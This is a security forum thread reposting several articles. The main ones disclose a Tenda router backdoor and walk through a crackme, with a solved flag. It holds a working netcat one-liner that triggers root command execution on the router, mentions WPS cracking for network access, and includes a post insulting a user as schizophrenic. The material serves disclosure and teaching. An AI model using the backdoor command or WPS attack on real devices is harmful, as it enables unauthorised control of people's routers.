Nytro

[h=1]From China, With Love[/h]By Craig | October 17, 2013 | Embedded Systems, Reverse Engineering Lest anyone think that D-Link is the only vendor who puts backdoors in their products, here’s one that can be exploited with a single UDP packet, courtesy of Tenda. After extracting the latest firmware for Tenda’s W302R wireless router, I started looking at /bin/httpd, which turned out to be the GoAhead webserver: Server header string in /bin/httpd But Tenda has made a lot of special modifications themselves. Just before entering the HTTP receive loop, main calls InitMfgTask, which spawns the MfgThread function as a separate thread: pthread_create(&var_10, 0, MfgThread, 0); Hmmm…InitMfgTask and MfgThread? Related to manufacturing tasks perhaps? Iiiiiinteresting… The first thing MfgThread does is create a UDP socket and bind it to port 7329: Create UDP socket and bind to port 7329 The thread then goes into a recvfrom loop, reading up to 128 bytes from the socket. It expects each received UDP packet to be at least 14 bytes in length: Read packet from socket and check packet size Now for the fun part; the received UDP packet is then parsed by this block of code: Processing the received packet In C, this code reads: memset(rx_magic_string, 0, 0x80); memset(command_byte, 0, 0x80); memset(command_arg, 0, 0x80); memcpy(rx_magic_string, rx_buf, 9); command_byte[0] = rx_buf[11]; memcpy(command_arg, rx_buf+12, rx_size-12); // If magic string doesn't match, stop processing this packet and wait for another packet if(strcmp(rx_magic_string, "w302r_mfg") != 0) goto outer_receive_loop; We can see that the thread is expecting a packet with the following structure: struct command_packet_t { char magic[10]; // 9 byte magic string ("w302r_mfg"), plus a NULL terminating byte char command_byte; char command_arg[117]; }; As long as the received packet starts with the string “w302r_mfg”, the code then compares the specified command byte against three ASCII characters (’1?, ‘x’, and ‘e’): Comparing command_byte to ’1?, ‘x’ and ‘e’ For simplicity, I’ve converted the remaining disassembly (at least the important bits) to the following C code: switch(command_byte) { case 'e': strcpy(tx_buf, "w302r_mfg"); tx_size = 9; break; case '1': if(strstr(command_arg, "iwpriv") != NULL) tx_size = call_shell(command_arg, tx_buf, 0x800); else strcpy(tx_buf, "000000"); tx_size = strlen(tx_buf); break; case 'x': tx_size = call_shell(command_arg, tx_buf, 0x800); break; default: goto outer_receive_loop; } sendto(client_socket, tx_buf, tx_size, client_sock_addr, 16); goto outer_receive_loop; The following actions correspond to the three accepted command bytes: ‘e’ – Responds with a pre-defined string, basically a ping test ’1? – Intended to allow you to run iwpriv commands ‘x’ – Allows you to run any command, as root If ‘x’ is specified as the command byte, the remainder of the packet after the command byte (called command_arg in the above code) is passed to call_shell, which executes the command via popen: popen(command_arg, “r”); What’s more, call_shell populates the tx_buf buffer with the output from the command, which, as we can see from the previous C code, is sent back to the client! Knowing the functionality of MfgThread and its expected packet structure, we can easily exercise this backdoor with netcat: $ echo -ne "w302r_mfg\x00x/bin/ls" | nc -u -q 5 192.168.0.1 7329 drwxr-xr-x 2 0 0 1363 webroot drwxr-xr-x 1 0 0 0 var drwxr-xr-x 5 0 0 43 usr drwxr-xr-x 1 0 0 0 tmp drwxr-xr-x 2 0 0 3 sys drwxr-xr-x 2 0 0 569 sbin dr-xr-xr-x 39 0 0 0 proc drwxr-xr-x 2 0 0 3 mnt drwxr-xr-x 1 0 0 0 media drwxr-xr-x 4 0 0 821 lib lrwxrwxrwx 1 0 0 11 init -> bin/busybox drwxr-xr-x 2 0 0 3 home drwxr-xr-x 7 0 0 154 etc_ro drwxr-xr-x 1 0 0 0 etc drwxr-xr-x 1 0 0 0 dev drwxr-xr-x 2 1000 100 574 bin One teensy-weensy, but ever so crucial little tiny detail is that the backdoor only listens on the LAN, thus it is not exploitable from the WAN. However, it is exploitable over the wireless network, which has WPS enabled by default with no brute force rate limiting. My shiny new ReaverPro box made relatively short work of cracking WPS, providing access to the WLAN and a subsequent root shell on the router (they also ship with a default WPA key, which you might want to try first): ReaverPro cracking the WPS pin Starting telnetd and getting a root shell As the magic string suggests, this backdoor was likely first implemented in Tenda’s W302R router, although it also exists in the Tenda W330R, as well as re-branded models, such as the Medialink MWN-WAPR150N. They all use the same “w302r_mfg” magic packet string. UPDATE: ea did a great job of grepping through various Tenda firmwares to find a lot more routers that are likely affected: Tenda backdoor - ea's blag Sursa: From China, With Love - /dev/ttyS0

Convert MySQL Queries to MongoDB Syntax http://www.querymongo.com/

[h=3]Beating an SEH/VEH based Crack me through analysis[/h]In this article , I will try to show how to beat an advanced crackme that is using an interesting way to calculate the length and it’s generating exceptions to be dealt with in order to return values into 32-bit registers such as EAX register , the key to beat a crackme is deep analysis through what it does under the hood especially when it’s using mixed methods to confuse,stop or slow the reverser. This Crackme was taken from a very popular challenge website that I will not mention , I edited the strings printed in the interface in memory not to spot the website . I was also the 16th person to validate it (Validation rate 1%). Let’s start by opening the CrackMe and see what it’s waited from us to do !! It asks us politely to type a pass or to Crack it I guess. Open your mind and carry on . Now we need to take a quick look on what routines are exactly dealing with the user input . Let’s switch to Immunity and take a quick look. You can see that it is taking a user input then calling an address specified by EBX register after that it’s deciding whether printing the success or fail message. We are now interested in what’s directly going after getting the user input using scanf so let’s see what EBX holds and step into that call. EBX isn't taking us farther but just below this code a little bit. The instructions which EBX will take us to are the ones responsible for checking the user input and deciding whether it’s right or not. The responsible routine is a little bit long and it’s split into 4 main parts each part ends with a JE (Jump If Equal) instruction. So let’s take care of each part alone : 1st Part – Checking the length : Here are the instructions : We can see that DEADBABE will be added to 227A65DD which will make ESI holding the memory address that specifies the user-input, then the next instruction will try to set the CarryFlag which is already set , the next instruction that may attract your attention is at address 00CC109D this is the address that will actually calculate the input string length . How did I know it ? I will explain. You can see that the value 400 is moved to ECX , you can also remark that 227A69D9 is moved to EDI then EBX is added to it , the result will be stored at EDI for sure. Before the ADD instruction we have a VERY important instruction which is SALC , this instruction will Set the AL value to FF if the CF is set or to 00 if the CF is cleared . In our case CF is set , so the value of AL will be FF , this value is very important because the SCASB instruction will try to find all bytes that aren’t matching AL starting at ES:[(E)DI] . In addition, here we have the REPE instruction that is accompaigned with the SCASB instruction so it will try to use the ECX register to specify a search « array » , you can clearly see that ECX register was set to 400. Now , go and check what EDI is holding after the ADD instruction you will see that it’s holding the value 00CC2497 . Follow this value in dump and you will find yourself in front of a bunch of «FF » , you see now that ECX holds the value 400 , this means that the search array will go to zero in other words and in theory the search will end when ECX will hold the value 00000000 , which make us figure out that the instruction will search for the first value that is different from « FF » from 00CC2497 until ( 00CC2497 – 400 ) = 00CC2097 and if no different values from FF were found ECX will just hold 00000000 . When following 00CC2097 in dump you will find what follows : Here, the REPE SCASB instruction will stop in the last highlighted NULL byte in blue « 00 » because it is different from « FF » here ECX will hold the length from 00012097 until the value before the null byte. In my case here (input 123456) ECX will hold the value 9 because we should begin the counting from 0 then 1 then 2 until reaching 9 means reaching 000120A0. Now that we know how the length is calculated we should figure out what length this crackme needs. In this phase we don’t care about if the serial is right or not because we just want to get through the first condition in a right way. You can see in the last two lines that we will subtract 0F from ECX then Jump if ZF=1 or not jump if ZF=0 , in other words if the ECX = 00000000 after the subtraction the ZF will be set if not it will still equal 0. So basically after the REPE SCASB instruction ECX should hold 0F which equals 15 in decimal . So we just need to insert a string with 12 character length and he jump will be taken 2nd Part – First 4 bytes of the flag : As the conditional jump was taken you will fall directly into the second instruction which is LODS DWORD PTR DS:[ESI], this instruction will basically load the DWORD DS:[ESI] value into EAX register this value should be the first 4 characters that we wrote in our flag in decimal and also converted to little endian so if the first 4 characters that you entered were 1234 then EAX should hold after this instruction 34333231. After that we see that a DWORD is moved to EDX then EAX is Xored with it , this is almost the same case that I coded in CrackMe#3 at Hackathon Challenge . The right value of EAX after xoring it with EDX should be 1608030E so the first DWORD of our flag is 1608030E Xored with EDX . Which will give you that value : XOR 1608030E, 5A643059 = 4C6C3357 you will just have to convert it to big endian and you will have the first 4-bytes of the flag : 57336C4C which is « W3lL » in ASCII. Now just type W3lL and type 8 random characters after it and you will see that ZF will be set after the compare and the jump will be taken. 3rd part – Second 4-bytes of the flag (SEH) : The 2 first parts were fun , now more . Let’s see the instructions : Like the last part, we will fall directly into the second instruction which will move a DWORD from memory to EBX register , after that a substruction of 1000 will be done to EBX which will carry now 00CC1530 . This adress is the new adresse of the exception handler which will be set in a while , EBX will be pushed then the new exception handler will be completely created when moving ESP into DWORD PTR FS:[0] . After that the second 4 bytes of the user-input will be placed into EAX register in little endian format , then a value that will xor EAX is moved into EBX. Here where the TRAP is : the « INT 1 » instruction. We can see here that when we will step over this instruction using « F8 » the EIP will just hold directly the adresse 00CC10DF , so we don’t have to step over this instructions but let run normally the crackme as it was executed outside a debugger . Basically the INT 01 instruction is called single-step break it will run after each instruction if the TrapFlag is set . Nevertheless, here it’s invoked directly inside the code and the TF is cleared which will generate an exception and never set the TF. Let me explain to you what is exactly happening when the « INT 1 » is passed through in normal execution and not by single stepping through it , keep in mind that this INT instruction will generate an exception that will be handeled by the SEH newly created . Basically when we will trigger this interrupt the processor will go into the 1st location in the Interrupt Vector Table which starts in memory location 0x00 and ends at 0x3FF simply because interrupts can take a number which is between 0 and 255. After that the IP will be saved and also the CS , this basically will store 4 bytes (IP = 2 bytes & CS = 2 bytes) , before the interrupt will hand back the flow of execution to the program normally it will return using an « iret » instruction . Here the IMPORTANT PART that the CS:IP and all FLAGS are restored again. So basically when the instruction PUSH EBX at 00CC10C6 is executed it will indicate the current SE Handler which means the instructions that will deal with an exception , the exception here is triggered by the « INT 1 » instruction and the execution flow is moved directly into 00CC1530 , after returning the exception will be handeled and the execution flow will continue normally . The only thing you need to do is just set a breakpoint on the instruction after the « INT 1 » instruction because the EIP will be incremented by 2 and it will skip that instruction. After we will return from the Exception handling routines we will see that EAX will hold a return value that is ADDed to the previous value that was held by EAX. Now let’s work on finding that god damn second part of the validation flag. Pretend that I didn't say that the return value stored in EAX isn't added to its previous value so here you can just see after stepping over the « INT 1 » that the value of EAX will change. So we need to figure out if the EAX holds an address that have been moved , added or subtracted to it. In order to do it let’s rerun our Crackme inside a debugger for sure . Now we will enter this input for example : W3lL11119876 the DWORD that will be treated in this part is 31313131 (111 in ASCII) so let’s step over the LODSD instruction and you will see that EAX is filled now with 31313131. As I said previously , you have to set a bp at 00CC10DD then step over it using <shift + F8> BUT we don’t want to do that now because this will make the value of EAX change and we will need to figure out what arithmetic operation is done when the value that is returned by interrupt will be Moved , added , subtracted , multiplied by the current value of EAX. So here what I've done is that I went and edited the value of EAX just before executing the interrupt to NULL , EAX =00000000 So I will not need to brute force each arithmetic operation if it’s an ADD so EAX will hold a value if it’s a multiplication EAX will still hold 0 , division either 0 or an exception ... etc So , after executing the Interrupt I realized that EAX holds the value 21486553 , let’s covert this to big endian and to ASCII cause it’s printable =) ... we will finally have 53654821 = SeH! If you want to be more sure if the operation is an addition just go and change EAX to 00000001 and you will get 21486554 which is in big endian + ASCII : TeH! . Ok so now after we knew what is the value returned by the interrupt we must know what is the right value that EAX should hold before the XOR instruction. That’s simple , we see that EAX is compared to 18D386D7 after being Xored and it’s Xored with 495F4265 , so just before the XOR and just after « INT 1 » EAX should hold : 518CC4B2 (Xoring 18D386D7 with 495F4265) . Okey now we found what value EAX should hold just after the « INT 1 » instruction and we know that after the interrupt 21486553 is added to EAX register . Sooo the right value of EAX after the LODSD instruction is 518CC4B2 – 21486553 = 30445F5F int big endian 5F5F4430 and in ASCII : __D0 . So now the 8 first characters of the flag are W3lL__D0 . Let’s try to rerun the crackme and enter this serial : W3lL__D09876 . By stepping throught instructions until the Jump if equal in this part (don’t forget the bp) , you will see that the ZF will be set and the jump will be taken simply because the comparison went true and those 4 bytes are the correct ones. 4th part – The last 4 bytes of the flag (VEH) : Here are the instructions : We can see from a general view that these instructions are building a Vectored Exception Handler (VEH) which will deal with an exception executing a routine present at the instruction pointed by EBX , pushing a second Nonzero argument indicates that the VEH is inserted into the very head of the list then it’s Removed after executing a bunch of instructions that will check how is the last DWORD of the user-input is correct , those instructions are containing an exception at adresse 00CC110A. But first what is a Vectored Exception Handler . According to MSDN : – Vectored Exception Handling is new as of Windows XP. – All information about VEH are stored in the Heap. – Vectored exception handlers are explicitly added by your code, rather than as a byproduct of try/catch statements. – Handlers aren't tied to a specific function nor are they tied to a stack frame. So basically to be sure that an excpetion is trigerred and dealed with we have to put a breakpoint on the first instruction that is executed by the VEH which will be the EBX register pushed adresse for sure. While running the code we will see that the last DWORD is loaded in little endian format again into EAX register then a value is moved to EBX which is the value that we will use for Xoring. But just after this we have a MOV instruction which will move EBX to the current DWORD in the memory location pointed by EBP , while stopping in that instruction you will see that EBP is holding the value 00000001 so an exception should be triggered as it’s impossible to move EBX to that location . If you put a bp on the pushed EBX in the stack you will see that the execution flow will be taken by the instructions at 00CC1960 (pushed EBX as an arg to create the VEH) . Those routines will handle this exception and return also a value to EAX register which will be added as happened in the previous part of checking the flag. So we will need to figure out what is that added value again , all we need to do is to change the value of EAX register after the LODSD instruction to 00000000 then put a breakpoint on 00CC110D and press « F9 » so we don’t skip that instruction as happened last time. Now all we have to do is look at what EAX is holding : it’s holding D9150F32 . So after the handling the exception this value (D9150F32) will be added to EAX register , now we need to figure out what should be the right value of EAX just after handling the exception means : (D9150F32+ LastFlagDwordLittleEndian) You will just have to XOR 8E7632F3 with EBX , and you will have this value : FA3654A0 . So the right last DWORD of the flag in little endian should be : FA3654A0 – D9150F32 =2121456E –> Big Endian = 6E452121 –> ASCII =nE!! So the last 4 characters of the flag are : nE!! ... 5 – Regrouping the 3 parts : So the complete flag to validate the challenge is : W3lL__D0nE!! Now just try to provide the flag to the Crackme and you will see that : Finally , this was a really GOOD crackme that I actually enjoyed discovering and cracking because it uses many handlers to deal with exceptions then return some values that will be added and also uses a very interesting method to check for the length . Author: The Article is submitted by Souhail Hammou (Dark-Puzzle) from www.itsecurity.ma. You can follow him here: http://www.facebook.com/dark.puzzle.sec & http://twitter.com/dark_puzzle Sursa: Beating an SEH/VEH based Crack me through analysis| Learn How to Hack| Ethical Hacking

Tipul e bolnav, ar trebui ajutat. Am editat postul de mai sus.

Firefox can't find the server at gktibioivpqbot.net. L-au si busit

Sa luam pe rand: 1. Generarea dinamica de date. Cica pentru aceleasi date de intrare, ai date de iesire diferite. Care e rostul atunci si cum se vor DECRYPTA datele? Cum se ajunge ca avand aceleasi date de intrare sa ai date diferite de iesire? Nu ai zis nimic de niciun PRNG. 2. Ce anume genereaza acele miliarde de ecuatiii diferentiale? 3. Bazate pe valorile de la pasul de timp anterior. Care valori? 4. Si de unde vor avea NOI valori? De ce? 5. Ce legatura au retelele neurale? 6. Se poate incripta in sistem la mai mult de un singur pas. Ha? De aici: Sincer, cred ca esti doar nebun si ca "geniu" nu are nicio legatura cu balivernele pe care le spui acolo. Ar trebui sa consulti un medic: http://ro.wikipedia.org/wiki/Schizofrenie O persoan? diagnosticat? cu schizofrenie poate avea halucina?ii (cele mai frecvente sunt reprezentate de auzirea unor voci), deliruri (adesea bizare sau de natur? persecutorie) ?i gândire ?i vorbire dezorganizate. Ultima poate baleia de la pierderea ?irului gândirii la fraze vag conectate ca în?eles ?i la incoeren??, cunoscut? drept schizofazie, în cazuri severe. Ai aceeasi problema ca tipa asta: http://www.youtube.com/watch?v=N8kQ7QetkdQ Pe scurt, plecand de la o idee ireala (nebuneasca si imposibila dupa cum tu ziceai), incerci sa o dezvolti dar o imbini cu niste lucruri care nu au nici cea mai mica legatura cu ideea ta. In final, iese un video ca cel de mai sus sau ca probabil multe altele, care nu are nici cea mai mica logica. Spre deosebire de tipa din videoclipul de mai sus, care probabil "e pasionata" de limba si literatura romana, tu esti pasionat de IT si de cryptografie. Rezultatul e acelasi.

https://www.facebook.com/photo.php?v=642481769116063

Social engineering bre.

[h=1]Microsoft Releases Remote Desktop for Android and iOS[/h] Android/iOS: Alongside Windows 8.1, Microsoft released its Remote Desktop application today for both Android and iOS. This makes it easy to control your Windows desktop from your Android or iOS device. As you'd expect, you can control pretty much everything on your Windows computer right from your smartphone or tablet. Once you're connected, you can control your computer using the touch interface with full support for Windows gestures. Everything's authenticated as well, so wherever you are your connection will remain secure. Microsoft Remote Desktop (Free) | Google Play Microsoft Remote Desktop (Free) | iTunes App Store Sursa: Microsoft Releases Remote Desktop for Android and iOS

[h=3]NCSAM – an Interview with Cesar Cerrudo[/h] By Cesar Cerrudo @cesarcer and Craig Brophy @craigbrophy Today we continue our support for National Cyber Security Awareness Month, by interviewing Cesar Cerrudo, Chief Technology Officer for IOActive Labs. Cesar provides us with some insight of how he got into IT security and why it's important to be persistent! IOActive: How did you get into security? Cesar: I think my first hacks were when I was 10 years old or so. I modified BASIC code on CZ Spectrum games and also cheated games by loading different parts of the code from a cassette (yes not floppy disk at that time and loading games from a cassette took around 5-10mins and if something went wrong you have to try again, I don’t miss that at all ), but after that I was mostly away from computers until I was 19 years old and went to college. I was always interested on learning to hack but didn't have enough resources or access to a PC. So while I was at college I started to read books, articles, etc. - anything I could get my hands on. I used to play (and sometimes break) a friend’s PC (hi Flaco ) once in a while when I had the opportunity. I remember learning Assembly language just from reading books and looking at virus code printed in papers. Finding that virus code and learning from it was amazing (not having a PC wasn’t a problem; a PC is just a tool). Later on, with some internet access (an hour or so a week), it became easier since lots of information became available and I got access to a PC; so I started to try the things I read about and started to build my own tools, etc. When you're learning and reading, one topic takes you to another topic and so on, but I focused on things that I was more familiar with - like web apps, database servers, Microsoft Windows, etc. Luckily in Argentina it wasn’t illegal to hack at that time so I could try things in real life and production systems . A long time ago, I remember walking to the office of the CEO of my local ISP provider handing him hundred thousands of users, passwords and credit card information and telling him that their servers where hackable and that I hacked them. I know this sounds crazy but I was young and in the end they thank me, and I helped them identify and fix the vulnerabilities. I asked for a job but no luck, don’t know why . I also did other crazy hacks when I was young but better to not talk about that , nothing criminal. I used to report the vulnerabilities but most admins didn’t like it. I recommend not engaging in anything illegal, as nowadays you can easily end up in jail if you try to hack a system. Today it is simpler to build a lab and play safely at home. Luckily those crazy times ended and soon I started to find vulnerabilities in known and widely used software such as SQL Server, Oracle, Windows, etc., I was then also able to create some new attack and exploitation techniques, etc. IOActive: What do you find most exciting about security? Cesar: Learning new things, challenges, solving difficult problems, etc. You get to deeply study how some technologies work and can identify security problems on software/hardware massively used worldwide that sometimes have big impact on everyone's lives since everything has become digital nowadays. IOActive: What do you like to research, and why? Cesar: This is related to previous answers, but I like challenges, learning and hacking stuff. IOActive: What advice would you give to someone who would like to become a pentester/researcher? Cesar: My advice would be if you are interested in or like hacking, nothing can stop you. Everything is out there to learn. You just need to try hard and put in a lot of effort without ever giving up. Nothing is impossible it's just matter of effort and persistence. Posted by Cesar Sursa: IOActive Labs Research: NCSAM – an Interview with Cesar Cerrudo

Paper Questions Robustness of Two Linux PRNGs [h=1]Paper Questions Robustness of Two Linux PRNGs[/h] by Michael Mimoso The sanctity of the dev/random random number generator used in the Linux kernel has been a hot-button issue for more than a month. A petition posted to change.org in September to remove RdRand from dev/random, for example, was met with fury from Linus Torvalds who called the developer who posted it “ignorant,” suggesting not so nicely too that the developer learn more about cryptography. Now a host of researchers from New York University and Northeastern University have cast doubt on the two Linux pseudo RNGs overall, dev/random and dev/urandom. In a paper released this week, “Security Analysis of Pseudo-Random Number Generators with Input: /dev/random is Not Robust,” the researchers explain attacks that demonstrate inherent weaknesses in the respective algorithms, and also propose what they say is a simpler and more efficient PRNG. “We show several attacks proving that these PRNGs are not robust according to our definition, and do not accumulate entropy properly. These attacks are due to the vulnerabilities of the entropy estimator and the internal mixing function of the Linux PRNGs,” the researchers wrote in their paper. “These attacks against the Linux PRNG show that it does not satisfy the ‘robustness’ notion of security, but it remains unclear if these attacks lead to actual exploitable vulnerabilities in practice.” This is not the first time hardware-based security operations have been challenged in the academic world. Most recently, a team of researchers demonstrated how they were able to insert malware onto a chip, yet to detection mechanisms, the chip appears to be unchanged. They did so by changing the dopant polarity of transistors, leaving wiring and other circuitry untouched; dopant is added to semiconductors enabling it to conduct electricity. The PRNG attacks against dev/random take issue with the randomness of the numbers being generated and how the PRNG could be manipulated in order for a third party to be able to guess or view a key. This is exactly the issue that forced RSA Security’s hand with regard to the Dual EC DRBG algorithm. RSA recommended to developers to stop using the RNG for fear that it might be compromised in some way by an intelligence agency. RSA’s recommendation came on the heels of a similar missive from NIST; Dual EC DRBG is the default random number generator for a number of RSA products including the BSAFE crypto libraries and RSA key management product RSA Data Protection Manager. While there are no immediate fears the Linux PRNG in dev/random is compromised, the researchers do painstakingly look at the behavior of the entropy estimator and the mixing function used to refresh its internal state, the paper said. “We have shown vulnerabilities on the entropy estimator due to its use when data is transferred between pools in Linux PRNG,” the paper said; the researchers, as a result, recommend that the functions of a PRNG do not rely on such an estimator. Sursa: /Dev/Random PRNG in Linux Questioned | Threatpost

OWASP Xenotix XSS Exploit Framework V4.5 OWASP Xenotix XSS Exploit Framework is an advanced Cross Site Scripting (XSS) vulnerability detection and exploitation framework. It provides Zero False Positive scan results with its unique Triple Browser Engine (Trident, WebKit, and Gecko) embedded scanner. It is claimed to have the world’s 2nd largest XSS Payloads of about 1500+ distinctive XSS Payloads for effective XSS vulnerability detection and WAF Bypass. It is incorporated with a feature rich Information Gathering module for target Reconnaissance. The Exploit Framework includes highly offensive XSS exploitation modules for Penetration Testing and Proof of Concept creation. V4.5 Additions ========== JavaScript Beautifier Pause and Resume support for Scan Jump to Payload Cookie Support for POST Request Cookie Support and Custom Headers for Header Scanner Added TRACE method Support Improved Interface Better Proxy Support WAF Fingerprinting Load Files <exploitation module> Hash Calculator Hash Detector Download: https://www.owasp.org/index.php/OWASP_Xenotix_XSS_Exploit_Framework#tab=Downloads Regards, Ajin Abraham Information Security Enthusiast. AJIN ABRAHAM | Defcon Kerala OpenSecurity | +91-9633325997 Sursa: WebApp Sec: OWASP Xenotix XSS Exploit Framework 4.5 is Relesed

Insecurities in the Linux /dev/random New paper: "Security Analysis of Pseudo-Random Number Generators with Input: /dev/random is not Robust, by Yevgeniy Dodis, David Pointcheval, Sylvain Ruhault, Damien Vergnaud, and Daniel Wichs. Abstract: A pseudo-random number generator (PRNG) is a deterministic algorithm that produces numbers whose distribution is indistinguishable from uniform. A formal security model for PRNGs with input was proposed in 2005 by Barak and Halevi (BH). This model involves an internal state that is refreshed with a (potentially biased) external random source, and a cryptographic function that outputs random numbers from the continually internal state. In this work we extend the BH model to also include a new security property capturing how it should accumulate the entropy of the input data into the internal state after state compromise. This property states that a good PRNG should be able to eventually recover from compromise even if the entropy is injected into the system at a very slow pace, and expresses the real-life expected behavior of existing PRNG designs. Unfortunately, we show that neither the model nor the specific PRNG construction proposed by Barak and Halevi meet this new property, despite meeting a weaker robustness notion introduced by BH. From a practical side, we also give a precise assessment of the security of the two Linux PRNGs, /dev/random and /dev/urandom. In particular, we show several attacks proving that these PRNGs are not robust according to our definition, and do not accumulate entropy properly. These attacks are due to the vulnerabilities of the entropy estimator and the internal mixing function of the Linux PRNGs. These attacks against the Linux PRNG show that it does not satisfy the "robustness" notion of security, but it remains unclear if these attacks lead to actual exploitable vulnerabilities in practice. Finally, we propose a simple and very efficient PRNG construction that is provably robust in our new and stronger adversarial model. We present benchmarks between this construction and the Linux PRNG that show that this construction is on average more efficient when recovering from a compromised internal state and when generating cryptographic keys. We therefore recommend to use this construction whenever a PRNG with input is used for cryptography. Sursa: https://www.schneier.com/blog/archives/2013/10/insecurities_in.html

Why Android SSL was downgraded from AES256-SHA to RC4-MD5 in late 2010 tl;dr Android is using the combination of horribly broken RC4 and MD5 as the first default cipher on all SSL connections. This impacts all apps that did not care enough to change the list of enabled ciphers (i.e. almost all existing apps). This post investigates why RC4-MD5 is the default cipher, and why it replaced better ciphers which were in use prior to the Android 2.3 release in December 2010. Preface Some time ago, I was adding secure authentication to my APRSdroid app for Amateur Radio geolocation. While debugging its TLS handshake, I noticed that RC4-MD5 is leading the client's list of supported ciphers and thus wins the negotiation. As the task at hand was about authentication, not about secrecy, I did not care. However, following speculations about what the NSA can decrypt, xnyhps' excellent post about XMPP clients (make sure to read the whole series) brought it into my focus again and I seriously asked myself what reasons led to it. Status Quo Analysis First, I fired up Wireshark, started yaxim on my Android 4.2.2 phone (CyanogenMod 10.1.3 on a Galaxy Nexus) and checked the Client Hello packet sent. Indeed, RC4-MD5 was first, followed by RC4-SHA1: To quote from RFC 2246: "The CipherSuite list, passed from the client to the server in the client hello message, contains the combinations of cryptographic algorithms supported by the client in order of the client's preference (favorite choice first)." Thus, the server is encouraged to actually use RC4-MD5 if it is not explicitly forbidden by its configuration. I crammed out my legacy devices and cross-checked Android 2.2.1 (CyanogenMod 6.1.0 on HTC Dream), 2.3.4 (Samsung original ROM on Galaxy SII) and 2.3.7 (CyanogenMod 7 on a Galaxy 5): [TABLE] [TR] [TH]Android 2.2.1[/TH] [TH]Android 2.3.4, 2.3.7[/TH] [TH]Android 4.2.2, 4.3[/TH] [/TR] [TR] [TD]DHE-RSA-AES256-SHA[/TD] [TD]RC4-MD5[/TD] [TD]RC4-MD5[/TD] [/TR] [TR] [TD]DHE-DSS-AES256-SHA[/TD] [TD]RC4-SHA[/TD] [TD]RC4-SHA[/TD] [/TR] [TR] [TD]AES256-SHA[/TD] [TD]AES128-SHA[/TD] [TD]AES128-SHA[/TD] [/TR] [TR] [TD]EDH-RSA-DES-CBC3-SHA[/TD] [TD]DHE-RSA-AES128-SHA[/TD] [TD]AES256-SHA[/TD] [/TR] [TR] [TD]EDH-DSS-DES-CBC3-SHA[/TD] [TD]DHE-DSS-AES128-SHA[/TD] [TD]ECDH-ECDSA-RC4-SHA[/TD] [/TR] [TR] [TD]DES-CBC3-SHA[/TD] [TD]DES-CBC3-SHA[/TD] [TD]ECDH-ECDSA-AES128-SHA[/TD] [/TR] [TR] [TD]DES-CBC3-MD5[/TD] [TD]EDH-RSA-DES-CBC3-SHA[/TD] [TD]ECDH-ECDSA-AES256-SHA[/TD] [/TR] [TR] [TD]DHE-RSA-AES128-SHA[/TD] [TD]EDH-DSS-DES-CBC3-SHA[/TD] [TD]ECDH-RSA-RC4-SHA[/TD] [/TR] [TR] [TD]DHE-DSS-AES128-SHA[/TD] [TD]DES-CBC-SHA[/TD] [TD]ECDH-RSA-AES128-SHA[/TD] [/TR] [TR] [TD]AES128-SHA[/TD] [TD]EDH-RSA-DES-CBC-SHA[/TD] [TD]ECDH-RSA-AES256-SHA[/TD] [/TR] [TR] [TD]RC2-CBC-MD5[/TD] [TD]EDH-DSS-DES-CBC-SHA[/TD] [TD]ECDHE-ECDSA-RC4-SHA[/TD] [/TR] [TR] [TD]RC4-SHA[/TD] [TD]EXP-RC4-MD5[/TD] [TD]ECDHE-ECDSA-AES128-SHA[/TD] [/TR] [TR] [TD]RC4-MD5[/TD] [TD]EXP-DES-CBC-SHA[/TD] [TD]ECDHE-ECDSA-AES256-SHA[/TD] [/TR] [TR] [TD]RC4-MD5[/TD] [TD]EXP-EDH-RSA-DES-CBC-SHA[/TD] [TD]ECDHE-RSA-RC4-SHA[/TD] [/TR] [TR] [TD]EDH-RSA-DES-CBC-SHA[/TD] [TD]EXP-EDH-DSS-DES-CBC-SHA[/TD] [TD]ECDHE-RSA-AES128-SHA[/TD] [/TR] [TR] [TD]EDH-DSS-DES-CBC-SHA[/TD] [TD][/TD] [TD]ECDHE-RSA-AES256-SHA[/TD] [/TR] [TR] [TD]DES-CBC-SHA[/TD] [TD][/TD] [TD]DHE-RSA-AES128-SHA[/TD] [/TR] [TR] [TD]DES-CBC-MD5[/TD] [TD][/TD] [TD]DHE-RSA-AES256-SHA[/TD] [/TR] [TR] [TD]EXP-EDH-RSA-DES-CBC-SHA[/TD] [TD][/TD] [TD]DHE-DSS-AES128-SHA[/TD] [/TR] [TR] [TD]EXP-EDH-DSS-DES-CBC-SHA[/TD] [TD][/TD] [TD]DHE-DSS-AES256-SHA[/TD] [/TR] [TR] [TD]EXP-DES-CBC-SHA[/TD] [TD][/TD] [TD]DES-CBC3-SHA[/TD] [/TR] [TR] [TD]EXP-RC2-CBC-MD5[/TD] [TD][/TD] [TD]ECDH-ECDSA-DES-CBC3-SHA[/TD] [/TR] [TR] [TD]EXP-RC2-CBC-MD5[/TD] [TD][/TD] [TD]ECDH-RSA-DES-CBC3-SHA[/TD] [/TR] [TR] [TD]EXP-RC4-MD5[/TD] [TD][/TD] [TD]ECDHE-ECDSA-DES-CBC3-SHA[/TD] [/TR] [TR] [TD]EXP-RC4-MD5[/TD] [TD][/TD] [TD]ECDHE-RSA-DES-CBC3-SHA[/TD] [/TR] [TR] [TD][/TD] [TD][/TD] [TD]EDH-RSA-DES-CBC3-SHA[/TD] [/TR] [TR] [TD][/TD] [TD][/TD] [TD]EDH-DSS-DES-CBC3-SHA[/TD] [/TR] [TR] [TD][/TD] [TD][/TD] [TD]DES-CBC-SHA[/TD] [/TR] [TR] [TD][/TD] [TD][/TD] [TD]EDH-RSA-DES-CBC-SHA[/TD] [/TR] [TR] [TD][/TD] [TD][/TD] [TD]EDH-DSS-DES-CBC-SHA[/TD] [/TR] [TR] [TD][/TD] [TD][/TD] [TD]EXP-RC4-MD5[/TD] [/TR] [TR] [TD][/TD] [TD][/TD] [TD]EXP-DES-CBC-SHA[/TD] [/TR] [TR] [TD][/TD] [TD][/TD] [TD]EXP-EDH-RSA-DES-CBC-SHA[/TD] [/TR] [TR] [TD][/TD] [TD][/TD] [TD]EXP-EDH-DSS-DES-CBC-SHA[/TD] [/TR] [/TABLE] As can be seen, Android 2.2.1 came with a set of AES256-SHA1 ciphers first, followed by 3DES and AES128. Android 2.3 significantly reduced the security by removing AES256 and putting the broken RC4-MD5 on the prominent first place, followed by the not-so-much-better RC4-SHA1. Wait... What? Yes, Android versions before 2.3 were using AES256 > 3DES > AES128 > RC4, and starting with 2.3 it was now: RC4 > AES128 > 3DES. Also, the recently broken MD5 suddenly became the favorite MAC (Update: MD5 in TLS is OK, as it is combining two different variants). As Android 2.3 was released in late 2010, speculations about the NSA pouring money on Android developers to sabotage all of us poor users arose immediately. I needed to do something, so I wrote a 